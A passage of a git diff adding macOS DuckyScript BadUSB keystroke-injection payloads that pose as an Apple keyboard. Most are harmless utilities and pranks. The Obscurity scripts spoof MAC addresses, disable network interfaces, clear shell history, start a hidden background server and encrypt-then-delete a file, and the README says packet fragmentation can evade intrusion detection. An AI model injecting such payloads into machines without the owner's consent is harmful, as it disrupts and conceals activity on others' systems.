@@ +REM Toggle Wifi +REM You'll need to STOP the Script after you see the wifi turn off (about 4 seconds) +REM To turn the wifi Back On let the script run all the way through + +REM Title: Toggle Wifi +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + + + +ID 05ac:021e Apple:Keyboard +DELAY 2000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 500 +STRING echo "Toggling Wi-Fi..." +ENTER +DELAY 500 +STRING networksetup -setairportpower en0 off +ENTER +DELAY 4000 +STRING networksetup -setairportpower en0 on +ENTER +DELAY 500 +GUI q +DELAY 500 +ENTER + diff --git a/BadUSB/MacOS-narstybits/Goodusb/Vtop Enhanced Dashboard.txt b/BadUSB/MacOS-narstybits/Goodusb/Vtop Enhanced Dashboard.txt new file mode 100644 index 00000000..ee0ab66d --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/Vtop Enhanced Dashboard.txt @@ -0,0 +1,26 @@ +REM System monitoring dashboard +REM shows CPU usage, memory, and network stats, as well as disk usage. +REM When you run this, you'll get a dynamic, colorful dashboard +REM showing your system's real-time statistics. +REM It's a practical use of the terminal's capabilities, and it's also visually impressive. + +REM Requirmetns: Homebrew and VTOP can install using command 'Brew install vtop' + +REM Title: VTOP Enhanced Dashboard +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +GUI-CTRL f +DELAY 2000 +STRING vtop +ENTER diff --git a/BadUSB/MacOS-narstybits/Goodusb/WIndow Organizer.txt b/BadUSB/MacOS-narstybits/Goodusb/WIndow Organizer.txt new file mode 100644 index 00000000..a1da50ad --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/WIndow Organizer.txt @@ -0,0 +1,28 @@ +REM Ducky Script to resize and arrange windows on macOS + +REM Title: WIndow Organizer +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: GOODUSB + + +ID 05ac:021e Apple:Keyboard +DELAY 2000 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 1000 +STRING osascript -e 'tell application "Terminal" to set bounds of window 1 to {0, 0, 600, 400}' +ENTER +DELAY 1000 +STRING osascript -e 'tell application "Google Chrome" to set bounds of window 1 to {600, 0, 1200, 400}' +ENTER +DELAY 1000 +STRING osascript -e 'tell application "Finder" to set bounds of window 1 to {0, 400, 600, 800}' +ENTER +DELAY 1000 +STRING osascript -e 'tell application "TextEdit" to set bounds of window 1 to {600, 400, 1200, 800}' +ENTER diff --git a/BadUSB/MacOS-narstybits/Goodusb/Weather Check.txt b/BadUSB/MacOS-narstybits/Goodusb/Weather Check.txt new file mode 100644 index 00000000..452ffa2d --- /dev/null +++ b/BadUSB/MacOS-narstybits/Goodusb/Weather Check.txt @@ -0,0 +1,23 @@ +REM Easily check the weather with the click of a button +REM Can change the location by replacing "NETHERLANDS" with your location + + +REM TITLE: Weather Check +REM Author: Narsty +REM Version:1.0 +REM Category: GOODUSB + + +DELAY 500 +GUI SPACE +DELAY 500 +STRING TERMINAL +DELAY 1000 +ENTER +DELAY 500 +STRING CURL WTTR.IN/NETHERLANDS +DELAY 500 +ENTER +DELAY 500 +GUI-CTRL F + diff --git a/BadUSB/MacOS-narstybits/Obscurity Readme.md b/BadUSB/MacOS-narstybits/Obscurity Readme.md new file mode 100644 index 00000000..e3d73fc9 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity Readme.md @@ -0,0 +1,96 @@ + + + + + + + + + + + + + + + + [![Image Description](https://imgur.com/8ZAFYsT.png)](https://github.com/narstybits/MacOS-DuckyScripts/tree/main/Obscurity) + +
+ Coding +
+ +

+
+ Giphy Image + + + + + +

Welcome to the Obscurity Folder!

+ +The Obscurity Folder is dedicated to the pursuit of a heightened level of obscurity, facilitating enhanced privacy and security in network and computer environments. + +

+Untraceable Network and Computer +
+ Coding +
+

+🔹By leveraging the power of advanced techniques and technologies, the scripts and tools provided in this repository empower users to create an untraceable network and computer infrastructure. With a focus on minimizing digital footprints and thwarting identification, these resources offer comprehensive solutions for shielding your online activities and preserving anonymity. + +

+Enhanced Privacy and Security +
+ Coding +
+

+🔹Emphasizing privacy as a fundamental right, the scripts and tools in this repository provide robust mechanisms for safeguarding sensitive information and data. By implementing cutting-edge encryption protocols, stealthy communication channels, and fortified access controls, users can fortify their digital presence and defend against various threats, both external and internal. + +

+Techniques +
+ Coding +
+

🔹 This repository explores various obfuscation techniques to enhance privacy and security in network environments. The following techniques are covered:

+ +
    +

    👻 Fragmentation: Fragmenting network packets into smaller pieces to bypass network filters and intrusion detection systems. + +

    👻 TCP Packet Timing Randomization: Introducing random delays between sending TCP packets to obfuscate packet timing and add an element of randomness to network traffic. + +

    👻 Network Padding: Adding additional data or padding to network packets to increase packet size and obfuscate the payload. +

    👻 Proxies: Utilizing proxy servers to route network traffic through intermediaries, enhancing privacy and bypassing network restrictions. +

+ + +

Tools +
+ Coding +
+

+
    +
  • 🔹Shadowsocks: is an open-source proxy tool designed to provide secure and private internet access. It works by encrypting network traffic and routing it through a remote server, effectively bypassing network restrictions and enhancing privacy. Shadowsocks utilizes a client-server architecture, where the client running on the user's device connects to a proxy server that acts as an intermediary for internet traffic.
  • +
  • 🔹 Scapy: Scapy is a powerful Python library used for packet manipulation and network scanning. It allows you to craft, send, and receive network packets, analyze network protocols, and perform various network-related tasks. With Scapy, you can build custom network tools, perform network testing and debugging, and explore network protocols in an interactive and flexible way.
  • +
  • 🔹 Tor: Tor is a free and open-source software that enables anonymous communication by directing internet traffic through a worldwide volunteer network of relays. It provides privacy and anonymity to users by encrypting and routing network traffic through multiple layers, making it difficult to track the origin of the communication. Tor is commonly used to access the internet anonymously and bypass censorship or restrictions.
  • +
+

+ + +

+Responsible Use and Ethical Considerations +
+ Coding +
+

+🔹It is crucial to note that the scripts and tools in this repository are intended solely for responsible and lawful purposes. Users are expected to adhere to legal frameworks, obtain appropriate authorization, and respect the rights and privacy of others. Engaging in any unauthorized or malicious activities is strictly prohibited and contrary to the principles of ethical hacking and responsible use.

+ +

🔹Also note that running these obfuscation scripts may have different effects depending on your network environment, and it should be used responsibly and within legal boundaries. Additionally, ensure that you have the necessary permissions and authorizations to perform obscurity network testing techniques on your own network. + + +

+ +
+ Coding +
+ diff --git a/BadUSB/MacOS-narstybits/Obscurity/DarkNet Angel Restore.txt b/BadUSB/MacOS-narstybits/Obscurity/DarkNet Angel Restore.txt new file mode 100644 index 00000000..3d06bc56 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/DarkNet Angel Restore.txt @@ -0,0 +1,40 @@ +REM Restores the original MAC address. +REM removes the DNS configuration. +REM disables firewall stealth mode. +REM and disengages the cloaking device. +REM 7 seconds to enter password + + +REM Run ifconfig en0 in the terminal to get your original MAC address +REM It will be displayed in the format xx:xx:xx:xx:xx:xx. +REM Replace in the script with the actual MAC address you obtained. + + +REM Author: Narsty +REM Title: DarkNet Angel Restore +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 500 +STRING sudo ifconfig en0 ether Original_mac_address +ENTER +DELAY 7000 +STRING sudo rm /etc/resolver/local +ENTER +DELAY 2000 +STRING sudo defaults write /Library/Preferences/com.apple.alf stealthenabled -bool false +ENTER +DELAY 2000 +STRING sudo sysctl -w net.inet.tcp.rfc6298valtso=1 +ENTER +DELAY 2000 +STRING exit +ENTER diff --git a/BadUSB/MacOS-narstybits/Obscurity/DarkNet Angel.txt b/BadUSB/MacOS-narstybits/Obscurity/DarkNet Angel.txt new file mode 100644 index 00000000..3f9e501d --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/DarkNet Angel.txt @@ -0,0 +1,40 @@ +REM spoofs the MAC address +REM randomizes DNS requests +REM enables firewall stealth mode +REM and engages the cloaking device +REM 7 seconds to enter password + + +REM Open the Terminal application on your macOS. +REM Run the following command: sudo mkdir /etc/resolver +REM This will create the /etc/resolver directory needed to randomize DNS request. + +REM Author: Narsty +REM Title: DarkNet Angel +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING sudo ifconfig en0 ether 00:11:22:33:44:55 +ENTER +DELAY 7000 +STRING sudo sh -c 'echo "nameserver 127.0.0.1" > /etc/resolver/local' +ENTER +DELAY 2000 +STRING sudo defaults write /Library/Preferences/com.apple.alf stealthenabled -bool true +ENTER +DELAY 2000 +STRING sudo sysctl -w net.inet.tcp.rfc6298valtso=0 +ENTER +DELAY 2000 +STRING exit +ENTER diff --git a/BadUSB/MacOS-narstybits/Obscurity/File Encryption.txt b/BadUSB/MacOS-narstybits/Obscurity/File Encryption.txt new file mode 100644 index 00000000..77a36ef6 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/File Encryption.txt @@ -0,0 +1,38 @@ +REM This script encrypts a file of your choice on the desktop (can change path) +REM The encrypted file will be named "ENCRYPTED.enc" +REM then it removes the original file. + +REM Replace "< >" with the correct file name & choose any password you'd like. +REM Must include file type in the file name. Example (.pdf .txt .doc .mp4) + + +REM To decrypt the file and return it to its original state enter the command below +REM Must include file type in the name. Example (.pdf .txt .doc) +REM password must be the same as when you encrypted + + +REM openssl enc -aes-256-cbc -d -in ~/Desktop/ENCRYPTED.enc -out ~/Desktop/ -pass pass: + + +REM Title: File Encryption +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + +DELAY 500 +GUI space +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING openssl enc -aes-256-cbc -salt -in ~/Desktop/ -out ~/Desktop/ENCRYPTED.enc -pass pass: +ENTER +DELAY 500 +STRING rm ~/Desktop/ +DELAY 1000 +ENTER +DELAY 250 +GUI w + diff --git a/BadUSB/MacOS-narstybits/Obscurity/Fragmentation Traffic Generator.txt b/BadUSB/MacOS-narstybits/Obscurity/Fragmentation Traffic Generator.txt new file mode 100644 index 00000000..6cb41012 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/Fragmentation Traffic Generator.txt @@ -0,0 +1,49 @@ +REM This script sets up a network fragmentation technique using Scapy. +REM It generates ICMP packets with a randomized payload length and performs fragmentation. +REM The payload is created by randomly selecting printable ASCII characters within a specific range. +REM The script constructs an IP packet with the specified destination IP address and ICMP payload. +REM It then fragments the packet into smaller fragments using a fragment size of 200 bytes. +REM The fragmented packets are sent with a delay of 0.1 seconds between each fragment. +REM The script continuously loops and sends the fragments to simulate fragmented network traffic. + +REM Network fragmentation can introduce complexity +REM and potential challenges for packet inspection and reassembly. +REM This technique aims to add an additional layer of obfuscation +REM to the network traffic by breaking it into smaller fragments. +REM However, it does not guarantee complete anonymity or provide absolute security. + +REM Adjust the range values in the payload generation +REM to control the length of the randomized payload. +REM The current range is set to generate payloads between 500 and 1500 characters. +REM Modify destination IP address in the 'IP(dst="10.0.0.1")' section to match your desired target. +REM Modify the fragment size (fragsize) and the delay between fragments (inter) as needed for your testing purposes. + + +REM Requirements: Python 3 and Scapy. You can install Scapy using the command 'pip3 install scapy'. + +REM Author: Narsty +REM Title: Fragmentation Traffic Generator +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +STRING python3 -c 'import random; from scapy.all import *; payload = "".join(chr(random.randint(32, 126)) for _ in range(random.randint(500, 1500))); packet = IP(dst="10.0.0.1") / ICMP() / payload; fragments = fragment(packet, fragsize=200); send(fragments, inter=0.1, loop=True)' +DELAY 500 +ENTER + + + + + + + + + diff --git a/BadUSB/MacOS-narstybits/Obscurity/MacCloak Reverse.txt b/BadUSB/MacOS-narstybits/Obscurity/MacCloak Reverse.txt new file mode 100644 index 00000000..396e8544 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/MacCloak Reverse.txt @@ -0,0 +1,44 @@ +REM restore the network settings and visibility. +REM Reverses the commands in MacCloak: Untraceable + +REM replace with the original hostname of your system. + +REM Author: Narsty +REM Title: MacCloak/Reverse +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING sudo dscacheutil -flushcache +ENTER +DELAY 500 +STRING defaults write com.apple.Safari CustomUserAgent "\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36\"" +ENTER +DELAY 500 +STRING sudo defaults write /Library/Preferences/com.apple.locationd.plist LocationServicesEnabled -bool true +ENTER +DELAY 500 +STRING defaults write com.apple.Safari PrivateBrowsingEnabled -bool false +ENTER +DELAY 500 +STRING defaults write com.apple.Siri SuggestionsEnabled -bool true +ENTER +DELAY 500 +STRING sudo scutil --set HostName +ENTER +DELAY 500 +STRING open /Applications/Safari.app +ENTER +DELAY 5000 +STRING history -c +ENTER diff --git a/BadUSB/MacOS-narstybits/Obscurity/MacCloak.txt b/BadUSB/MacOS-narstybits/Obscurity/MacCloak.txt new file mode 100644 index 00000000..f9ff288b --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/MacCloak.txt @@ -0,0 +1,56 @@ +REM Clear DNS Cach +REM Randomize User Agent +REM Disable Location Services +REM Clear Browsing History +REM Enable Private Browsing Mode +REM Disable Siri Suggestions +REM Randomize Hostname +REM Clear Terminal History +REM Open Tor Browser + +REM Please note that some commands may require administrative privileges (sudo). +REM Replace with a random hostname of your choice. + +REM Author: Narsty +REM Title: MacCloak: Untraceable +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING sudo dscacheutil -flushcache +DELAY 7000 +ENTER +DELAY 500 +STRING defaults write com.apple.Safari CustomUserAgent "\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"" +DELAY 500 +ENTER +DELAY 500 +STRING sudo defaults write /Library/Preferences/com.apple.locationd.plist LocationServicesEnabled -bool false +ENTER +DELAY 500 +STRING rm -rf ~/Library/Caches/com.apple.Safari/ +ENTER +DELAY 500 +STRING defaults write com.apple.Safari PrivateBrowsingEnabled -bool true +ENTER +DELAY 500 +STRING defaults write com.apple.Siri SuggestionsEnabled -bool false +ENTER +DELAY 500 +STRING sudo scutil --set HostName +ENTER +DELAY 500 +STRING open /Applications/TorBrowser.app +ENTER +DELAY 5000 +STRING history -c +ENTER diff --git a/BadUSB/MacOS-narstybits/Obscurity/MacNetGhost.txt b/BadUSB/MacOS-narstybits/Obscurity/MacNetGhost.txt new file mode 100644 index 00000000..94e2d20d --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/MacNetGhost.txt @@ -0,0 +1,51 @@ +REM Ducky Script for Network Obscurity and Disabling Interfaces + +REM Author: Narsty +REM Title: MacNetGhost +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING sudo ifconfig en0 down +ENTER +DELAY 7000 +STRING sudo ifconfig en1 down +ENTER +DELAY 500 +STRING sudo ifconfig en2 down +ENTER +DELAY 500 +STRING sudo ifconfig en3 down +ENTER +DELAY 500 +STRING sudo ifconfig en4 down +ENTER +DELAY 500 +STRING sudo ifconfig en5 down +ENTER +DELAY 500 +STRING sudo ifconfig en6 down +ENTER +DELAY 500 +STRING sudo ifconfig en7 down +ENTER +DELAY 500 +STRING sudo ifconfig en8 down +ENTER +DELAY 500 +STRING sudo ifconfig en9 down +ENTER +DELAY 1000 +STRING exit +ENTER + + diff --git a/BadUSB/MacOS-narstybits/Obscurity/MacNetGhostRestore.txt b/BadUSB/MacOS-narstybits/Obscurity/MacNetGhostRestore.txt new file mode 100644 index 00000000..1043edcd --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/MacNetGhostRestore.txt @@ -0,0 +1,49 @@ +REM Ducky Script to Restore Disabled Network Interfaces + +REM Author: Narsty +REM Title: MacNetGhostRestore +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 500 +ENTER +DELAY 1000 +STRING sudo ifconfig en0 up +ENTER +DELAY 7000 +STRING sudo ifconfig en1 up +ENTER +DELAY 500 +STRING sudo ifconfig en2 up +ENTER +DELAY 500 +STRING sudo ifconfig en3 up +ENTER +DELAY 500 +STRING sudo ifconfig en4 up +ENTER +DELAY 500 +STRING sudo ifconfig en5 up +ENTER +DELAY 500 +STRING sudo ifconfig en6 up +ENTER +DELAY 500 +STRING sudo ifconfig en7 up +ENTER +DELAY 500 +STRING sudo ifconfig en8 up +ENTER +DELAY 500 +STRING sudo ifconfig en9 up +ENTER +DELAY 1000 +STRING exit +ENTER diff --git a/BadUSB/MacOS-narstybits/Obscurity/Network Padding Fury.txt b/BadUSB/MacOS-narstybits/Obscurity/Network Padding Fury.txt new file mode 100644 index 00000000..01977982 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/Network Padding Fury.txt @@ -0,0 +1,41 @@ +REM This script sets up a network padding technique. +REM Using Scapy to send padded IP packets with random payload length. +REM Each packet is padded with a random number of 'A' characters to obfuscate the payload. +REM This helps to add padding to the network traffic and increase the overall packet size. +REM Keep in mind that while network padding can add some level of privacy, +REM it doesn't guarantee complete anonymity or security. + +REM By default, it sends 600 packets with random payload length and padding. +REM Current script runs for about 5 minutes +REM Change the range value in the 'send([packet] * 600)' line 33 +REM For example, changing it to 'send([packet] * 1200)' will last about 10 minutes. +REM Adjust the inter parameter to control the delay between each packet. +REM The current value is set to 0.5 seconds, but you can modify it as needed for your testing purposes. + +REM Requirements: Python 3 and Scapy. You can install Scapy using the command 'pip3 install scapy'. +REM warnings can be ignored as they indicate that no IPv4 address is currently assigned to those interfaces. +REM The script will continue to function as intended + +REM Author: Narsty +REM Title: Network Padding Fury +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +STRING python3 -c 'import random, time; from scapy.all import *; packet = IP() / Padding(load="A" * random.randint(100, 200)); send([packet] * 600, inter=0.5)' +ENTER + + + + + + + diff --git a/BadUSB/MacOS-narstybits/Obscurity/Shadowsocks Proxy Ninja Reverse.txt b/BadUSB/MacOS-narstybits/Obscurity/Shadowsocks Proxy Ninja Reverse.txt new file mode 100644 index 00000000..7cbbcec8 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/Shadowsocks Proxy Ninja Reverse.txt @@ -0,0 +1,32 @@ +REM Disabling Shadowsocks and Proxy Server +REM These commands disable the system-level proxy settings & stop the Shadowsocks service +REM Adjust this command based on how you started the service + +REM you can use the ps command in the terminal to check if the Shadowsocks process is running. +REM command 'ps -ef | grep shadowsocks' +REM you can also kill the PID to end the Shadowsocks Process + + + +REM Author: Narsty +REM Title: Shadowsocks Proxy Ninja Reverse +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 1000 +STRING brew services stop shadowsocks-libev +ENTER +DELAY 3000 +STRING networksetup -setsocksfirewallproxystate Wi-Fi off +ENTER +DELAY 3000 + + diff --git a/BadUSB/MacOS-narstybits/Obscurity/Shadowsocks Proxy Ninja.txt b/BadUSB/MacOS-narstybits/Obscurity/Shadowsocks Proxy Ninja.txt new file mode 100644 index 00000000..fff52d2f --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/Shadowsocks Proxy Ninja.txt @@ -0,0 +1,32 @@ +REM Shadowsocks encrypts your network traffic and routes it through the proxy server +REM making it difficult for third parties to analyze or decipher your data. +REM This can help protect your network traffic from being easily monitored or intercepted. + +REM Requirements: Shadowsocks can be installed using command 'brew install shadowsocks-libev' + +REM you can use the ps command in the terminal to check if the Shadowsocks process is running. +REM command 'ps -ef | grep shadowsocks' + + + +REM Author: Narsty +REM Title: Shadowsocks Proxy Ninja +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING brew services start shadowsocks-libev +ENTER +DELAY 5000 +STRING networksetup -setsocksfirewallproxy Wi-Fi 127.0.0.1 1080 +ENTER +DELAY 250 + diff --git a/BadUSB/MacOS-narstybits/Obscurity/Shadowsocks Tor Proxy Reverse.txt b/BadUSB/MacOS-narstybits/Obscurity/Shadowsocks Tor Proxy Reverse.txt new file mode 100644 index 00000000..b604281c --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/Shadowsocks Tor Proxy Reverse.txt @@ -0,0 +1,29 @@ +REM Returns your wifi network back to normal. +REM Must use the Kill command with the PID number to end tor 'Kill PID#' + + +REM You can use the ps command in the terminal to check if the Shadowsocks +REM and Tor processes are running. +REM Command to check Shadowsocks: 'ps -ef | grep shadowsocks' +REM Command to check Tor: 'ps -ef | grep tor' + + +REM Author: Narsty +REM Title: Shadowsocks Tor Proxy Reverse +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING networksetup -setsocksfirewallproxystate Wi-Fi off +ENTER + + + diff --git a/BadUSB/MacOS-narstybits/Obscurity/Shadowsocks Tor Proxy.txt b/BadUSB/MacOS-narstybits/Obscurity/Shadowsocks Tor Proxy.txt new file mode 100644 index 00000000..6b46449d --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/Shadowsocks Tor Proxy.txt @@ -0,0 +1,33 @@ +REM This script sets up a Shadowsocks Tor Proxy on your Mac +REM Encrypts your network traffic and routes it through the Tor network. +REM By combining the encryption of Shadowsocks with the anonymity of Tor. +REM This setup enhances your online privacy and security. + +REM Requirements: Install Shadowsocks by running 'brew install shadowsocks-libev' +REM Requirements: Install Tor by running 'brew install tor' + +REM You can use the ps command in the terminal to check if the Shadowsocks +REM and Tor processes are running. +REM Command to check Shadowsocks: 'ps -ef | grep shadowsocks' +REM Command to check Tor: 'ps -ef | grep tor' + + + +REM Author: Narsty +REM Title: Shadowsocks Tor Proxy +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING networksetup -setsocksfirewallproxy Wi-Fi 127.0.0.1 9050 +ENTER +DELAY 250 + diff --git a/BadUSB/MacOS-narstybits/Obscurity/Silent Server Creator.txt b/BadUSB/MacOS-narstybits/Obscurity/Silent Server Creator.txt new file mode 100644 index 00000000..f5f223da --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/Silent Server Creator.txt @@ -0,0 +1,37 @@ +REM Script that uses obfuscation to stealthily create a local HTTP server +REM hosting a simple web page on the machine. +REM access the server by opening a web browser and navigating to localhost:9090 + + + +REM Creates a new directory in the tmp folder named "ghost_server" +REM Creates a new HTML file named "index.html" with the message "Hello, this is the Silent Server!". +REM Starts a http.server server using Python's built-in SimpleHTTPServer module on port 9090. +REM The nohup command allows the server to continue running even after the terminal is closed +REM the output is redirected to /dev/null so that it doesn't appear in the terminal. + +REM Author: Narsty +REM Title: Silent Server Creator +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 500 +STRING mkdir /tmp/ghost_server && cd /tmp/ghost_server +ENTER +DELAY 500 +STRING echo '

Hello, this is the Phantom Server!

' > index.html +ENTER +DELAY 500 +STRING nohup python3 -m http.server 9090 > /dev/null 2>&1 & +ENTER +DELAY 500 + + diff --git a/BadUSB/MacOS-narstybits/Obscurity/TCP Randomizer.txt b/BadUSB/MacOS-narstybits/Obscurity/TCP Randomizer.txt new file mode 100644 index 00000000..146a3df2 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Obscurity/TCP Randomizer.txt @@ -0,0 +1,42 @@ +REM This script sets up a TCP randomization technique +REM Using Scapy to randomize the TCP packets by introducing random delays +REM between sending each packet. +REM This helps to obfuscate the packet timing. +REM Also adds an element of randomness to the network traffic. +REM Keep in mind that while it adds some level of randomness, +REM it doesn't guarantee complete anonymity or security. + + +REM This runs 1000 randomized TCP packets which last about 5 minutes. +REM You can change the 'send_packet(packet) for _ in range(1000)' parameter to extend the time. +REM For example if you change to 2000 this will last about 10 minutes. +REM Adjust the values of min_delay and max_delay as per your requirement. + +REM Requirements:Python 3, and Scapy can install using the command 'pip3 install scapy' +REM warnings can be ignored as they indicate that no IPv4 address is currently assigned to those interfaces. +REM The script will continue to function as intended + + +REM Author: Narsty +REM Title: TCP Randomizer +REM Target: MacOS +REM Version: 1.0 +REM Category: Obscurity + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +STRING python3 -c 'import random, time; from scapy.all import *; min_delay = 0.1; max_delay = 0.5; packet = IP() / TCP(); send_packet = lambda pkt: (time.sleep(random.uniform(min_delay, max_delay)), send(pkt)); [send_packet(packet) for _ in range(1000)]' +DELAY 1000 +ENTER + + + + + + diff --git a/BadUSB/MacOS-narstybits/Pranks/ASCII Aquarium.txt b/BadUSB/MacOS-narstybits/Pranks/ASCII Aquarium.txt new file mode 100644 index 00000000..fd4a2d71 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/ASCII Aquarium.txt @@ -0,0 +1,31 @@ +REM Runs ASCII Aquarium Animation in Terminal +REM Required Apps: Terminal, asciiquarium (installed via Homebrew) + + +REM Title: ASCII Aquarium +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + + +ID 05ac:021e Apple:Keyboard +GUI SPACE +DELAY 100 +STRING terminal.app +DELAY 500 +ENTER +DELAY 1000 +CTRL c +DELAY 250 +GUI CTRL f +DELAY 700 +STRING brew install asciiquarium +DELAY 500 +ENTER +DELAY 16000 +STRING asciiquarium +DELAY 250 +ENTER + diff --git a/BadUSB/MacOS-narstybits/Pranks/Cat Flickering Terminal.txt b/BadUSB/MacOS-narstybits/Pranks/Cat Flickering Terminal.txt new file mode 100644 index 00000000..30b574cb --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Cat Flickering Terminal.txt @@ -0,0 +1,48 @@ +REM Displays colorful cat animation +REM Flickering Terminal "Happy Hacking Day!" + + +REM Title: Cat Flickering Terminal +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 500 +GUI-CTRL f +DELAY 2000 +STRING clear +ENTER +DELAY 500 +STRING brew install nyancat +ENTER +DELAY 16000 +STRING nyancat -f 200 -s +ENTER +DELAY 6000 +STRING clear +ENTER +DELAY 500 +STRING tput cup 0 0 +ENTER +DELAY 500 +STRING while true; do printf '\e[1;31m'; printf 'HAPPY '; printf '\e[1;32m'; printf 'HACKING '; printf '\e[1;33m'; printf 'DAY! '; printf '\e[1;34m'; printf ' '; printf '\e[1;35m'; printf ' '; printf '\e[1;36m'; printf ' '; printf '\e[1;37m'; printf ' '; sleep 0.2; clear; printf '\e[1;31m'; printf ' '; printf '\e[1;32m'; printf ' '; printf '\e[1;33m'; printf ' '; printf '\e[1;34m'; printf ' '; printf '\e[1;35m'; printf ' '; printf '\e[1;36m'; printf 'HAPPY '; printf '\e[1;37m'; printf 'HACKING '; printf '\e[1;31m'; printf 'DAY! '; printf '\e[1;32m'; printf ' '; sleep 0.2; clear; printf '\e[1;31m'; printf ' '; printf '\e[1;32m'; printf ' '; printf '\e[1;33m'; printf ' '; printf '\e[1;34m'; printf ' '; printf '\e[1;35m'; printf ' '; printf '\e[1;36m'; printf 'HAPPY '; printf '\e[1;37m'; printf 'HACKING '; printf '\e[1;31m'; printf 'DAY! '; printf '\e[1;32m'; printf ' '; sleep 0.2; clear; printf '\e[1;31m'; printf ' '; printf '\e[1;32m'; printf ' '; printf '\e[1;33m'; printf ' '; printf '\e[1;34m'; printf ' '; printf '\e[1;35m'; printf ' '; printf '\e[1;36m'; printf 'HAPPY '; printf '\e[1;37m'; printf 'HACKING '; printf '\e[1;31m'; printf 'DAY! '; printf '\e[1;32m'; printf ' '; sleep 0.2; clear; done +ENTER +DELAY 500 +STRING clear +ENTER +DELAY 1000 +STRING echo "Happy Hacking Day! Enjoy the show!" +ENTER +DELAY 3000 +STRING exit +ENTER diff --git a/BadUSB/MacOS-narstybits/Pranks/Fake Update.txt b/BadUSB/MacOS-narstybits/Pranks/Fake Update.txt new file 